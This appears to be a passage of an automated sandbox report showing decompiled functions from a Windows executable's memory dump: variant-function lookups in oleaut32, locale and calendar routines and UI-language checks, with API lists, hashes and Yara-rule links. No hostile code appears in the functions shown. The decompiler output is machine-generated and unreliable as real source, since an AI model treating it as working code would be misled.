                                                            Function 00427874, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}






                                                            0x00427882
                                                            0x00427896
                                                            0x004278ac
                                                            0x004278c2
                                                            0x004278d8
                                                            0x004278ee
                                                            0x00427904
                                                            0x0042791a
                                                            0x00427930
                                                            0x00427946
                                                            0x0042795c
                                                            0x00427972
                                                            0x00427988
                                                            0x0042799e
                                                            0x004279b4
                                                            0x004279ca
                                                            0x004279e0
                                                            0x004279f6
                                                            0x00427a0c
                                                            0x00427a22
                                                            0x00427a38
                                                            0x00427a4e
                                                            0x00427a5e
                                                            0x00427a64
                                                            0x00427a6b

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                              • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                            • API String ID: 1646373207-1918263038
                                                            • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                            • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                            • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                            • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E7CC, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}


































                                                            0x0041e7cc
                                                            0x0041e7cc
                                                            0x0041e7cc
                                                            0x0041e7cd
                                                            0x0041e7cf
                                                            0x0041e7d4
                                                            0x0041e7d7
                                                            0x0041e7da
                                                            0x0041e7dd
                                                            0x0041e7e1
                                                            0x0041e7e2
                                                            0x0041e7e7
                                                            0x0041e7ea
                                                            0x0041e7ed
                                                            0x0041e7f2
                                                            0x0041e7f5
                                                            0x0041e7f9
                                                            0x0041e7f9
                                                            0x0041e80b
                                                            0x0041e812
                                                            0x0041e813
                                                            0x0041e818
                                                            0x0041e81b
                                                            0x0041e820
                                                            0x0041e826
                                                            0x0041e837
                                                            0x0041e83c
                                                            0x0041e84f
                                                            0x0041e861
                                                            0x0041e86b
                                                            0x0041e8c8
                                                            0x0041e8cb
                                                            0x0041e8d6
                                                            0x0041e8dc
                                                            0x0041e8ed
                                                            0x0041e8f2
                                                            0x0041e8ff
                                                            0x0041e90b
                                                            0x0041e90e
                                                            0x0041e913
                                                            0x0041e91a
                                                            0x0041e92d
                                                            0x0041e937
                                                            0x0041e93a
                                                            0x0041e93d
                                                            0x0041e945
                                                            0x0041e948
                                                            0x0041e957
                                                            0x0041e95c
                                                            0x0041e961
                                                            0x0041e963
                                                            0x0041e965
                                                            0x0041e965
                                                            0x0041e968
                                                            0x0041e968
                                                            0x0041e96c
                                                            0x0041e96d
                                                            0x0041e96f
                                                            0x0041e971
                                                            0x0041e976
                                                            0x0041e97f
                                                            0x0041e987
                                                            0x0041e988
                                                            0x0041e988
                                                            0x0041e988
                                                            0x0041e976
                                                            0x0041e999
                                                            0x0041e999
                                                            0x0041e86d
                                                            0x0041e87b
                                                            0x0041e880
                                                            0x0041e887
                                                            0x0041e88c
                                                            0x0041e88c
                                                            0x0041e890
                                                            0x0041e893
                                                            0x0041e895
                                                            0x0041e896
                                                            0x0041e898
                                                            0x0041e8a1
                                                            0x0041e8a9
                                                            0x0041e8aa
                                                            0x0041e8aa
                                                            0x0041e898
                                                            0x0041e8bb
                                                            0x0041e8bb
                                                            0x0041e9a3
                                                            0x0041e9a7
                                                            0x0041e9ac
                                                            0x0041e9ac
                                                            0x0041e9ae
                                                            0x0041e9c2
                                                            0x0041e9ca
                                                            0x0041e9d1
                                                            0x0041e9d6
                                                            0x0041e9d6
                                                            0x0041e9da
                                                            0x0041e9dd
                                                            0x0041e9df
                                                            0x0041e9e0
                                                            0x0041e9e2
                                                            0x0041e9e2
                                                            0x0041e9fa
                                                            0x0041ea00
                                                            0x0041ea05
                                                            0x0041ea06
                                                            0x0041ea06
                                                            0x0041e9e2
                                                            0x0041ea0e
                                                            0x0041ea14
                                                            0x0041ea19
                                                            0x0041ea20
                                                            0x0041ea25
                                                            0x0041ea25
                                                            0x0041ea27
                                                            0x0041ea2e
                                                            0x0041ea30
                                                            0x0041ea31
                                                            0x0041ea34
                                                            0x0041ea43

                                                            APIs
                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CalendarEnumInfoLocaleThread
                                                            • String ID: B.C.$ToA$K$K$K
                                                            • API String ID: 683597275-1724967715
                                                            • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                            • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                            • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                            • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040A250, Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}





                                                            0x0040a255
                                                            0x0040a25a
                                                            0x0040a268
                                                            0x0040a270
                                                            0x0040a27e
                                                            0x0040a295
                                                            0x0040a2af
                                                            0x0040a2c4
                                                            0x0040a2c9
                                                            0x00000000
                                                            0x0040a2c9
                                                            0x0040a2ce

                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                            • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                            • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                            • API String ID: 74573329-1403180336
                                                            • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                            • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                            • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                            • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E0AC, Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}





























                                                            0x0041e0ac
                                                            0x0041e0ac
                                                            0x0041e0ad
                                                            0x0041e0af
                                                            0x0041e0b4
                                                            0x0041e0b4
                                                            0x0041e0b6
                                                            0x0041e0b8
                                                            0x0041e0b8
                                                            0x0041e0bd
                                                            0x0041e0be
                                                            0x0041e0c0
                                                            0x0041e0c4
                                                            0x0041e0c5
                                                            0x0041e0ca
                                                            0x0041e0cd
                                                            0x0041e0d3
                                                            0x0041e0d8
                                                            0x0041e0da
                                                            0x0041e0e1
                                                            0x0041e0e1
                                                            0x0041e0e9
                                                            0x0041e0ef
                                                            0x0041e0f8
                                                            0x0041e101
                                                            0x0041e10a
                                                            0x0041e11c
                                                            0x0041e126
                                                            0x0041e13b
                                                            0x0041e14a
                                                            0x0041e15d
                                                            0x0041e16c
                                                            0x0041e182
                                                            0x0041e199
                                                            0x0041e1b0
                                                            0x0041e1bf
                                                            0x0041e1d2
                                                            0x0041e1d4
                                                            0x0041e1d8
                                                            0x0041e1e9
                                                            0x0041e1f4
                                                            0x0041e1fd
                                                            0x0041e20e
                                                            0x0041e219
                                                            0x0041e22e
                                                            0x0041e242
                                                            0x0041e24d
                                                            0x0041e262
                                                            0x0041e26d
                                                            0x0041e275
                                                            0x0041e27d
                                                            0x0041e292
                                                            0x0041e29c
                                                            0x0041e2a1
                                                            0x0041e2a3
                                                            0x0041e2bc
                                                            0x0041e2a5
                                                            0x0041e2ad
                                                            0x0041e2ad
                                                            0x0041e2d1
                                                            0x0041e2db
                                                            0x0041e2e0
                                                            0x0041e2e2
                                                            0x0041e2f4
                                                            0x0041e305
                                                            0x0041e31e
                                                            0x0041e307
                                                            0x0041e30f
                                                            0x0041e30f
                                                            0x0041e305
                                                            0x0041e323
                                                            0x0041e326
                                                            0x0041e329
                                                            0x0041e32e
                                                            0x0041e339
                                                            0x0041e33e
                                                            0x0041e341
                                                            0x0041e344
                                                            0x0041e349
                                                            0x0041e354
                                                            0x0041e369
                                                            0x0041e36d
                                                            0x0041e378
                                                            0x0041e37b
                                                            0x0041e37e
                                                            0x0041e390

                                                            APIs
                                                            • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                            • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                              • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                              • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Locale$Info$ThreadValid
                                                            • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                            • API String ID: 233154393-2808312488
                                                            • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                            • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                            • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                            • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040A7E4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}









                                                            0x0040a7e4
                                                            0x0040a7e7
                                                            0x0040a7e9
                                                            0x0040a7ea
                                                            0x0040a7eb
                                                            0x0040a7ed
                                                            0x0040a7f1
                                                            0x0040a7f2
                                                            0x0040a7f7
                                                            0x0040a7fa
                                                            0x0040a802
                                                            0x0040a80e
                                                            0x0040a835
                                                            0x0040a83c
                                                            0x0040a84e
                                                            0x0040a857
                                                            0x0040a868
                                                            0x0040a86d
                                                            0x0040a875
                                                            0x0040a87a
                                                            0x0040a883
                                                            0x0040a883
                                                            0x0040a888
                                                            0x0040a890
                                                            0x0040a89a
                                                            0x0040a89a
                                                            0x0040a859
                                                            0x0040a85d
                                                            0x0040a85d
                                                            0x0040a857
                                                            0x0040a8a4
                                                            0x0040a8a9
                                                            0x0040a8c3
                                                            0x0040a8cd
                                                            0x0040a810
                                                            0x0040a81c
                                                            0x0040a826
                                                            0x0040a826
                                                            0x0040a8d4
                                                            0x0040a8d7
                                                            0x0040a8da
                                                            0x0040a8e7

                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                            • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
